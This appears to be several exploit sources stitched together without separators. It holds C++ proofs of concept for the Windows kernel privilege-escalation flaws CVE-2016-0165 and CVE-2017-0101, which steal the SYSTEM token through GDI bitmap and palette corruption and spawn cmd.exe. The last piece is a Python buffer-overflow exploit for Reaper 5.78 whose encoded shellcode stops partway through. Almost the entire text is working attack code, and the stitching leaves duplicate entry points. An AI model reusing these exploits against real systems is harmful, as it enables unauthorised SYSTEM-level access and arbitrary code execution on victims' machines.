for (LONG i = 0; i < tmpTimes; i++)
{
if (hacctab[i] == NULL)
{
continue;
}
DestroyAcceleratorTable(hacctab[i]);
hacctab[i] = NULL;
}
}
static
BOOL xxRetrieveBitmapBits(VOID)
{
pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
ZeroMemory(pBmpHunted, 0x1000);
LONG index = -1;
LONG iLeng = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
if (iLeng < 0x2D0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpHunted = hbitmap[i];
break;
}
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
BOOL xxGetExtendPalette(VOID)
{
PVOID pBmpExtend = malloc(0x1000);
LONG index = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
if (hbitmap[i] == hBmpHunted)
{
continue;
}
if (GetBitmapBits(hbitmap[i], 0x1000, pBmpExtend) < 0x2D0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpExtend = hbitmap[i];
break;
}
free(pBmpExtend);
pBmpExtend = NULL;
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
VOID xxOutputBitmapBits(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++)
{
std::cout << '[';
std::cout.fill('0');
std::cout.width(4);
std::cout << i << ']' << (PVOID)pBmpHunted[i];
if (((i + 1) % 4) != 0)
{
std::cout << " ";
}
else
{
std::cout << std::endl;
}
}
std::cout.width(0);
}
static
BOOL xxFixHuntedPoolHeader(VOID)
{
DWORD szInputBit[0x100] = { 0 };
CONST LONG iTrueCbdHead = 205;
CONST LONG iTrueBmpHead = 937;
szInputBit[0] = pBmpHunted[iTrueCbdHead + 0];
szInputBit[1] = pBmpHunted[iTrueCbdHead + 1];
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
bReturn = xxPointToHit(iMemHunted + 0xb70, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxFixHuntedBitmapObject(VOID)
{
DWORD szInputBit[0x100] = { 0 };
szInputBit[0] = (DWORD)hBmpHunted;
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0xb78, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
bReturn = xxPointToHit(iMemHunted + 0xb8c, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
DWORD_PTR
xxGetNtoskrnlAddress(VOID)
{
DWORD_PTR AddrList[500] = { 0 };
DWORD cbNeeded = 0;
EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
return AddrList[0];
}
static
DWORD_PTR
xxGetSysPROCESS(VOID)
{
DWORD_PTR Module = 0x00;
DWORD_PTR NtAddr = 0x00;
Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
FreeLibrary((HMODULE)Module);
NtAddr = NtAddr - Module;
Module = xxGetNtoskrnlAddress();
if (Module == 0x00)
{
return 0x00;
}
NtAddr = NtAddr + Module;
if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)))
{
return 0x00;
}
return NtAddr;
}
CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;
static
DWORD_PTR
xxGetTarPROCESS(DWORD_PTR SysPROC)
{
if (SysPROC == 0x00)
{
return 0x00;
}
DWORD_PTR point = SysPROC;
DWORD_PTR value = 0x00;
do
{
value = 0x00;
xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
if (value == GetCurrentProcessId())
{
return point;
}
value = 0x00;
xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
point = value - off_EPROCESS_ActiveLinks;
if (point == SysPROC)
{
break;
}
} while (TRUE);
return 0x00;
}
CONST LONG off_EPROCESS_Token = 0x0f8;
static DWORD_PTR dstToken = 0x00;
static DWORD_PTR srcToken = 0x00;
static
BOOL
xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
// get target process original token pointer
xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
if (dstToken == 0x00)
{
return FALSE;
}
// get system process token pointer
xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
if (srcToken == 0x00)
{
return FALSE;
}
// modify target process token pointer to system
xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
// just test if the modification is successful
DWORD_PTR tmpToken = 0x00;
xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
if (tmpToken != srcToken)
{
return FALSE;
}
return TRUE;
}
static
BOOL
xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
if (dstToken == 0x00 || srcToken == 0x00)
{
return FALSE;
}
// recover the original token pointer to target process
xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
return TRUE;
}
static
VOID xxCreateCmdLineProcess(VOID)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
static
VOID xxPrivilegeElevation(VOID)
{
BOOL bReturn = FALSE;
do
{
DWORD SysPROC = 0x0;
DWORD TarPROC = 0x0;
POCDEBUG_BREAK();
SysPROC = xxGetSysPROCESS();
if (SysPROC == 0x00)
{
break;
}
std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
POCDEBUG_BREAK();
TarPROC = xxGetTarPROCESS(SysPROC);
if (TarPROC == 0x00)
{
break;
}
std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
POCDEBUG_BREAK();
bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
POCDEBUG_BREAK();
xxCreateCmdLineProcess();
POCDEBUG_BREAK();
std::cout << "RECOVER TOKEN..." << std::endl;
bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << "FAILED" << std::endl;
}
}
INT POC_CVE20160165(VOID)
{
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2016-0165" << std::endl;
std::cout << "-------------------" << std::endl;
BOOL bReturn = FALSE;
do
{
std::cout << "INIT POINTS..." << std::endl;
xxInitPoints();
HDC hdc = GetDC(NULL);
std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
if (hdc == NULL)
{
bReturn = FALSE;
break;
}
std::cout << "BEGIN DC PATH..." << std::endl;
bReturn = BeginPath(hdc);
if (!bReturn)
{
break;
}
std::cout << "DRAW POLYLINES..." << std::endl;
bReturn = xxDrawPolyLines(hdc);
if (!bReturn)
{
break;
}
std::cout << "ENDED DC PATH..." << std::endl;
bReturn = EndPath(hdc);
if (!bReturn)
{
break;
}
std::cout << "CREATE BITMAPS (1)..." << std::endl;
bReturn = xxCreateBitmaps(0xE34, 0x01, 8);
if (!bReturn)
{
break;
}
std::cout << "CREATE ACCTABS (1)..." << std::endl;
bReturn = xxCreateAcceleratorTables();
if (!bReturn)
{
break;
}
std::cout << "DELETE BITMAPS (1)..." << std::endl;
xxDeleteBitmaps();
std::cout << "CREATE CLIPBDS (1)..." << std::endl;
xxCreateClipboards();
std::cout << "CREATE BITMAPS (2)..." << std::endl;
bReturn = xxCreateBitmaps(0x01, 0xB1, 32);
std::cout << "DELETE ACCTABS (H)..." << std::endl;
xxDigHoleInAcceleratorTables(2000, 4000);
std::cout << "PATH TO REGION..." << std::endl;
POCDEBUG_BREAK();
HRGN hrgn = PathToRegion(hdc);
if (hrgn == NULL)
{
bReturn = FALSE;
break;
}
std::cout << "DELETE REGION..." << std::endl;
DeleteObject(hrgn);
std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
bReturn = xxRetrieveBitmapBits();
if (!bReturn)
{
break;
}
// std::cout << "OUTPUT BITMAP BITS..." << std::endl;
// xxOutputBitmapBits();
std::cout << "MODIFY EXTEND BITMAP HEIGHT..." << std::endl;
POCDEBUG_BREAK();
bReturn = xxPoint(iExtHeight, 0xFFFFFFFF);
if (!bReturn)
{
break;
}
std::cout << "LOCATE EXTEND BITMAP..." << std::endl;
bReturn = xxGetExtendPalette();
if (!bReturn)
{
break;
}
if ((pBmpHunted[iExtpScan0] & 0xFFF) != 0x00000CCC)
{
bReturn = FALSE;
std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtpScan0] << std::endl;
break;
}
iMemHunted = (pBmpHunted[iExtpScan0] & ~0xFFF) - 0x1000;
std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
bReturn = xxFixHuntedPoolHeader();
if (!bReturn)
{
break;
}
std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
bReturn = xxFixHuntedBitmapObject();
if (!bReturn)
{
break;
}
std::cout << "-------------------" << std::endl;
std::cout << "PRIVILEGE ELEVATION" << std::endl;
std::cout << "-------------------" << std::endl;
xxPrivilegeElevation();
std::cout << "-------------------" << std::endl;
std::cout << "DELETE BITMAPS (2)..." << std::endl;
xxDeleteBitmaps();
std::cout << "DELETE ACCTABS (3)..." << std::endl;
xxDeleteAcceleratorTables();
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << GetLastError() << std::endl;
}
std::cout << "-------------------" << std::endl;
getchar();
return 0;
}
INT main(INT argc, CHAR *argv[])
{
POC_CVE20160165();
return 0;
}
#include <Windows.h>
#include <wingdi.h>
#include <iostream>
#include <Psapi.h>
#pragma comment(lib, "psapi.lib")
#define POCDEBUG 0
#if POCDEBUG == 1
#define POCDEBUG_BREAK() getchar()
#elif POCDEBUG == 2
#define POCDEBUG_BREAK() DebugBreak()
#else
#define POCDEBUG_BREAK()
#endif
CONST LONG maxTimes = 2000;
CONST LONG tmpTimes = 3000;
static HBITMAP hbitmap[maxTimes] = { NULL };
static HPALETTE hpalette[maxTimes] = { NULL };
static DWORD iMemHunted = NULL;
static HBITMAP hBmpHunted = NULL;
static PDWORD pBmpHunted = NULL;
static HPALETTE hPalExtend = NULL;
CONST LONG iExtPaleHmgr = 809;
CONST LONG iExtcEntries = 814;
CONST LONG iExtPalColor = 828;
typedef struct _PATRECT {
INT nXLeft;
INT nYLeft;
INT nWidth;
INT nHeight;
HBRUSH hBrush;
} PATRECT, *PPATRECT;
typedef BOOL (WINAPI *pfPolyPatBlt)(HDC hdc, DWORD rop, PPATRECT pPoly, DWORD Count, DWORD Mode);
static
BOOL xxCreateBitmaps(INT nWidth, INT Height, UINT nbitCount)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
hbitmap[i] = CreateBitmap(nWidth, Height, 1, nbitCount, NULL);
if (hbitmap[i] == NULL)
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxDeleteBitmaps(VOID)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
bReturn = DeleteObject(hbitmap[i]);
hbitmap[i] = NULL;
}
return bReturn;
}
static
BOOL xxRegisterWndClasses(LPCSTR menuName)
{
POCDEBUG_BREAK();
CHAR buf[0x10] = { 0 };
for (LONG i = 0; i < tmpTimes; i++)
{
WNDCLASSEXA Class = { 0 };
sprintf(buf, "CLS_%d", i);
Class.lpfnWndProc = DefWindowProcA;
Class.lpszClassName = buf;
Class.lpszMenuName = menuName;
Class.cbSize = sizeof(WNDCLASSEXA);
if (!RegisterClassExA(&Class))
{
return FALSE;
}
}
return TRUE;
}
static
BOOL xxDigHoleInWndClasses(LONG b, LONG e)
{
BOOL bReturn = FALSE;
CHAR buf[0x10] = { 0 };
for (LONG i = b; i < e; i++)
{
sprintf(buf, "CLS_%d", i);
bReturn = UnregisterClassA(buf, NULL);
}
return bReturn;
}
static
BOOL xxUnregisterWndClasses(VOID)
{
BOOL bReturn = FALSE;
CHAR buf[0x10] = { 0 };
for (LONG i = 0; i < tmpTimes; i++)
{
sprintf(buf, "CLS_%d", i);
bReturn = UnregisterClassA(buf, NULL);
}
return bReturn;
}
static
BOOL xxCreatePalettes(ULONG cEntries)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
PLOGPALETTE pal = NULL;
// 0x64*4+0x58+8=0x1f0
pal = (PLOGPALETTE)malloc(sizeof(LOGPALETTE) + cEntries * sizeof(PALETTEENTRY));
pal->palVersion = 0x300;
pal->palNumEntries = cEntries;
for (LONG i = 0; i < maxTimes; i++)
{
hpalette[i] = CreatePalette(pal);
if (hpalette[i] == NULL)
{
bReturn = FALSE;
break;
}
bReturn = TRUE;
}
free(pal);
return bReturn;
}
static
BOOL xxDeletePalettes(VOID)
{
BOOL bReturn = FALSE;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
bReturn = DeleteObject(hpalette[i]);
hpalette[i] = NULL;
}
return bReturn;
}
static
BOOL xxRetrieveBitmapBits(VOID)
{
pBmpHunted = static_cast<PDWORD>(malloc(0x1000));
ZeroMemory(pBmpHunted, 0x1000);
LONG index = -1;
LONG iLeng = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
iLeng = GetBitmapBits(hbitmap[i], 0x1000, pBmpHunted);
if (iLeng < 0xCA0)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hbitmap[i] << std::endl;
hBmpHunted = hbitmap[i];
break;
}
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
VOID xxOutputBitmapBits(VOID)
{
POCDEBUG_BREAK();
for (LONG i = 0; i < 0x1000 / sizeof(DWORD); i++)
{
std::cout << '[';
std::cout.fill('0');
std::cout.width(4);
std::cout << i << ']' << (PVOID)pBmpHunted[i];
if (((i + 1) % 4) != 0)
{
std::cout << " ";
}
else
{
std::cout << std::endl;
}
}
std::cout.width(0);
}
static
BOOL xxGetExtendPalette(HPALETTE hHandle)
{
LONG index = -1;
POCDEBUG_BREAK();
for (LONG i = 0; i < maxTimes; i++)
{
if (hpalette[i] != hHandle)
{
continue;
}
index = i;
std::cout << "LOCATE: " << '[' << i << ']' << hpalette[i] << std::endl;
hPalExtend = hpalette[i];
break;
}
if (index == -1)
{
std::cout << "FAILED: " << (PVOID)(-1) << std::endl;
return FALSE;
}
return TRUE;
}
static
BOOL xxPoint(LONG id, DWORD Value)
{
LONG iLeng = 0x00;
pBmpHunted[id] = Value;
iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
if (iLeng < 0xD00)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToHit(LONG addr, PVOID pvBits, DWORD cb)
{
UINT iLeng = 0;
pBmpHunted[iExtPalColor] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
if (iLeng < 0xD00)
{
return FALSE;
}
PVOID pvTable = NULL;
UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4
pvTable = malloc(cbSize);
memcpy(pvTable, pvBits, cb);
iLeng = SetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable);
free(pvTable);
if (iLeng < cbSize / 4)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxPointToGet(LONG addr, PVOID pvBits, DWORD cb)
{
BOOL iLeng = 0;
pBmpHunted[iExtPalColor] = addr;
iLeng = SetBitmapBits(hBmpHunted, 0xD00, pBmpHunted);
if (iLeng < 0xD00)
{
return FALSE;
}
PVOID pvTable = NULL;
UINT cbSize = (cb + 3) & ~3; // sizeof(PALETTEENTRY) => 4
pvTable = malloc(cbSize);
iLeng = GetPaletteEntries(hPalExtend, 0, cbSize / 4, (PPALETTEENTRY)pvTable);
memcpy(pvBits, pvTable, cb);
free(pvTable);
if (iLeng < cbSize / 4)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxFixHuntedPoolHeader(VOID)
{
DWORD szInputBit[0x100] = { 0 };
CONST LONG iTrueBmpHead = 937;
szInputBit[0] = pBmpHunted[iTrueBmpHead + 0];
szInputBit[1] = pBmpHunted[iTrueBmpHead + 1];
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0x000, szInputBit, 0x08);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
BOOL xxFixHuntedBitmapObject(VOID)
{
DWORD szInputBit[0x100] = { 0 };
szInputBit[0] = (DWORD)hBmpHunted;
BOOL bReturn = FALSE;
bReturn = xxPointToHit(iMemHunted + 0x08, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
bReturn = xxPointToHit(iMemHunted + 0x1c, szInputBit, 0x04);
if (!bReturn)
{
return FALSE;
}
return TRUE;
}
static
DWORD_PTR
xxGetNtoskrnlAddress(VOID)
{
DWORD_PTR AddrList[500] = { 0 };
DWORD cbNeeded = 0;
EnumDeviceDrivers((LPVOID *)&AddrList, sizeof(AddrList), &cbNeeded);
return AddrList[0];
}
static
DWORD_PTR
xxGetSysPROCESS(VOID)
{
DWORD_PTR Module = 0x00;
DWORD_PTR NtAddr = 0x00;
Module = (DWORD_PTR)LoadLibraryA("ntkrnlpa.exe");
NtAddr = (DWORD_PTR)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
FreeLibrary((HMODULE)Module);
NtAddr = NtAddr - Module;
Module = xxGetNtoskrnlAddress();
if (Module == 0x00)
{
return 0x00;
}
NtAddr = NtAddr + Module;
if (!xxPointToGet(NtAddr, &NtAddr, sizeof(DWORD_PTR)))
{
return 0x00;
}
return NtAddr;
}
CONST LONG off_EPROCESS_UniqueProId = 0x0b4;
CONST LONG off_EPROCESS_ActiveLinks = 0x0b8;
static
DWORD_PTR
xxGetTarPROCESS(DWORD_PTR SysPROC)
{
if (SysPROC == 0x00)
{
return 0x00;
}
DWORD_PTR point = SysPROC;
DWORD_PTR value = 0x00;
do
{
value = 0x00;
xxPointToGet(point + off_EPROCESS_UniqueProId, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
if (value == GetCurrentProcessId())
{
return point;
}
value = 0x00;
xxPointToGet(point + off_EPROCESS_ActiveLinks, &value, sizeof(DWORD_PTR));
if (value == 0x00)
{
break;
}
point = value - off_EPROCESS_ActiveLinks;
if (point == SysPROC)
{
break;
}
} while (TRUE);
return 0x00;
}
CONST LONG off_EPROCESS_Token = 0x0f8;
static DWORD_PTR dstToken = 0x00;
static DWORD_PTR srcToken = 0x00;
static
BOOL
xxModifyTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
// get target process original token pointer
xxPointToGet(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
if (dstToken == 0x00)
{
return FALSE;
}
// get system process token pointer
xxPointToGet(srcPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
if (srcToken == 0x00)
{
return FALSE;
}
// modify target process token pointer to system
xxPointToHit(dstPROC + off_EPROCESS_Token, &srcToken, sizeof(DWORD_PTR));
// just test if the modification is successful
DWORD_PTR tmpToken = 0x00;
xxPointToGet(dstPROC + off_EPROCESS_Token, &tmpToken, sizeof(DWORD_PTR));
if (tmpToken != srcToken)
{
return FALSE;
}
return TRUE;
}
static
BOOL
xxRecoverTokenPointer(DWORD_PTR dstPROC, DWORD_PTR srcPROC)
{
if (dstPROC == 0x00 || srcPROC == 0x00)
{
return FALSE;
}
if (dstToken == 0x00 || srcToken == 0x00)
{
return FALSE;
}
// recover the original token pointer to target process
xxPointToHit(dstPROC + off_EPROCESS_Token, &dstToken, sizeof(DWORD_PTR));
return TRUE;
}
static
VOID xxCreateCmdLineProcess(VOID)
{
STARTUPINFO si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}
static
VOID xxPrivilegeElevation(VOID)
{
BOOL bReturn = FALSE;
do
{
DWORD SysPROC = 0x0;
DWORD TarPROC = 0x0;
POCDEBUG_BREAK();
SysPROC = xxGetSysPROCESS();
if (SysPROC == 0x00)
{
break;
}
std::cout << "SYSTEM PROCESS: " << (PVOID)SysPROC << std::endl;
POCDEBUG_BREAK();
TarPROC = xxGetTarPROCESS(SysPROC);
if (TarPROC == 0x00)
{
break;
}
std::cout << "TARGET PROCESS: " << (PVOID)TarPROC << std::endl;
POCDEBUG_BREAK();
bReturn = xxModifyTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
std::cout << "MODIFIED TOKEN TO SYSTEM!" << std::endl;
std::cout << "CREATE NEW CMDLINE PROCESS..." << std::endl;
POCDEBUG_BREAK();
xxCreateCmdLineProcess();
POCDEBUG_BREAK();
std::cout << "RECOVER TOKEN..." << std::endl;
bReturn = xxRecoverTokenPointer(TarPROC, SysPROC);
if (!bReturn)
{
break;
}
bReturn = TRUE;
} while (FALSE);
if (!bReturn)
{
std::cout << "FAILED" << std::endl;
}
}
INT POC_CVE20170101(VOID)
{
std::cout << "-------------------" << std::endl;
std::cout << "POC - CVE-2017-0101" << std::endl;
std::cout << "-------------------" << std::endl;
BOOL bReturn = FALSE;
HDC hdc = NULL;
HBITMAP hbmp = NULL;
HBRUSH hbru = NULL;
pfPolyPatBlt pfnPolyPatBlt = NULL;
do
{
hdc = GetDC(NULL);
std::cout << "GET DEVICE CONTEXT: " << hdc << std::endl;
if (hdc == NULL)
{
break;
}
std::cout << "CREATE PATTERN BRUSH BITMAP..." << std::endl;
hbmp = CreateBitmap(0x36D, 0x12AE8F, 1, 1, NULL);
if (hbmp == NULL)
{
break;
}
std::cout << "CREATE PATTERN BRUSH..." << std::endl;
hbru = CreatePatternBrush(hbmp);
if (hbru == NULL)
{
break;
}
std::cout << "CREATE BITMAPS (1)..." << std::endl;
bReturn = xxCreateBitmaps(0xE8C, 1, 8);
if (!bReturn)
{
break;
}
std::cout << "REGISTER WINDOW CLASSES..." << std::endl;
bReturn = xxRegisterWndClasses("KCUF");
if (!bReturn)
{
break;
}
std::cout << "DELETE BITMAPS (1)..." << std::endl;
xxDeleteBitmaps();
std::cout << "CREATE BITMAPS (2)..." << std::endl;
bReturn = xxCreateBitmaps(0xC98, 1, 8);
if (!bReturn)
{
break;
}
std::cout << "CREATE PALETTES (1)..." << std::endl;
bReturn = xxCreatePalettes(0x64);
if (!bReturn)
{
break;
}
std::cout << "UNREGISTER WINDOW CLASSES (H)..." << std::endl;
xxDigHoleInWndClasses(1000, 2000);
std::cout << "POLYPATBLT..." << std::endl;
POCDEBUG_BREAK();
pfnPolyPatBlt = (pfPolyPatBlt)GetProcAddress(GetModuleHandleA("gdi32"), "PolyPatBlt");
if (pfnPolyPatBlt == NULL)
{
break;
}
PATRECT ppb[1] = { 0 };
ppb[0].nXLeft = 0x100;
ppb[0].nYLeft = 0x100;
ppb[0].nWidth = 0x100;
ppb[0].nHeight = 0x100;
ppb[0].hBrush = hbru;
pfnPolyPatBlt(hdc, PATCOPY, ppb, 1, 0);
std::cout << "LOCATE HUNTED BITMAP..." << std::endl;
bReturn = xxRetrieveBitmapBits();
if (!bReturn)
{
break;
}
// std::cout << "OUTPUT BITMAP BITS..." << std::endl;
// xxOutputBitmapBits();
std::cout << "LOCATE EXTEND PALETTE..." << std::endl;
bReturn = xxGetExtendPalette((HPALETTE)pBmpHunted[iExtPaleHmgr]);
if (!bReturn)
{
break;
}
if ((pBmpHunted[iExtcEntries]) != 0x64 ||
(pBmpHunted[iExtPalColor] & 0xFFF) != 0x00000E54)
{
bReturn = FALSE;
std::cout << "FAILED: " << (PVOID)pBmpHunted[iExtPalColor] << std::endl;
break;
}
iMemHunted = (pBmpHunted[iExtPalColor] & ~0xFFF);
std::cout << "HUNTED PAGE: " << (PVOID)iMemHunted << std::endl;
std::cout << "FIX HUNTED POOL HEADER..." << std::endl;
bReturn = xxFixHuntedPoolHeader();
if (!bReturn)
{
break;
}
std::cout << "FIX HUNTED BITMAP OBJECT..." << std::endl;
bReturn = xxFixHuntedBitmapObject();
if (!bReturn)
{
break;
}
std::cout << "-------------------" << std::endl;
std::cout << "PRIVILEGE ELEVATION" << std::endl;
std::cout << "-------------------" << std::endl;
xxPrivilegeElevation();
std::cout << "-------------------" << std::endl;
std::cout << "DELETE BITMAPS (2)..." << std::endl;
xxDeleteBitmaps();
std::cout << "DELETE PALETTES (1)..." << std::endl;
xxDeletePalettes();
bReturn = TRUE;
} while (FALSE);
if (bReturn == FALSE)
{
std::cout << GetLastError() << std::endl;
}
POCDEBUG_BREAK();
std::cout << "DELETE BRUSH..." << std::endl;
DeleteObject(hbru);
DeleteObject(hbmp);
std::cout << "UNREGISTER WINDOW CLASSES (1)..." << std::endl;
xxUnregisterWndClasses();
std::cout << "-------------------" << std::endl;
getchar();
return 0;
}
INT main(INT argc, CHAR *argv[])
{
POC_CVE20170101();
return 0;
}
# Exploit Title: Reaper 5.78 - Local Buffer Overflow
# Exploit Author: bzyo
# CVE: CVE-2018-9131
# Date: 2018-03-30
# Vulnerable Software: Reaper 5.78
# Vendor Homepage: https://www.reaper.fm/
# Version: 5.78
# Software Link: https://www.reaper.fm/download.php
# Tested On: Windows 7 x86
#
# lots of bad chars, use alpha_mixed with register
# bad chars \x00\x0a\x0d and everything above \x80
#
# PoC:
# 1. generate reaper578.txt, copy contents to clipboard
# 2. open app, select Options, select Preferences
# 3. choose ReaScript
# 4. paste reaper578.txt contents into both fields:
# 'Custom path to Python dll directory'
# 'Force ReaScript to use specific Python dll'
# 5. pop calc
#
import struct
filename="reaper578.txt"
junk = "A"*95
#0x10042e5a : push esp # ret | ascii {PAGE_EXECUTE_READ} [elastique.dll]
eip = struct.pack('<I',0x10042e5a)
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
#Payload size: 440 bytes
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6d\x52\x35\x50"
"\x35\x50\x65\x50\x75\x30\x6b\x39\x6a\x45\x70\x31\x4f\x30\x65"
"\x34\x4c\x4b\x56\x30\x76\x50\x4c\x4b\x46\x32\x56\x6c\x6e\x6b"
"\x73\x62\x55\x44\x4c\x4b\x71\x62\x51\x38\x36\x6f\x4f\x47\x53"
"\x7a\x56\x46\x66\x51\x49\x6f\x4e\x4c\x67\x4c\x55\x31\x63\x4c"
"\x57\x72\x54\x6c\x57\x50\x79\x51\x4a\x6f\x64\x4d\x67\x71\x49"
"\x57\x4a\x42\x48\x72\x71\x42\x52\x77\x4c\x4b\x52\x72\x46\x70"
"\x4e\x6b\x71\x5a\x47\x4c\x6c\x4b\x30\x4c\x42\x31\x34\x38\x69"
"\x73\x37\x38\x77\x71\x5a\x71\x32\x71\x4c\x4b\x62\x79\x35\x70"
"\x75\x51\x39\x43\x6e\x6b\x71\x59\x32\x38\x4d\x33\x45\x6a\x61"
"\x59\x4c\x4b\x74\x74\x6c\x4b\x43\x31\x4b\x66\x75\x61\x59\x6f"
"\x4c\x6c\x6b\x71\x48\x4f\x46\x6d\x36\x61\x6f\x37\x34\x78\x69"
"\x70\x71\x65\x69\x66\x77\x73\x33\x4d\x58\x78\x77\x4b\x61\x6d"
"\x35\x74\x62\x55\x58\x64\x71\x48\x6e\x6b\x33\x68\x66\x44\x63"
"\x31\x6a\x73\x55\x36\x4c\x4b\x36\x6c\x70\x4b\x6e\x6b\x51\x48"
"\x35\x4c\x65\x51\x7a\x73\x6e\x6b\x44\x44\x6e\x6b\x57\x71\x38"
"\x50\x6d\x59\x53\x74\x56\x44\x75\x74\x43\x6b\x33\x6b\x43\x51"
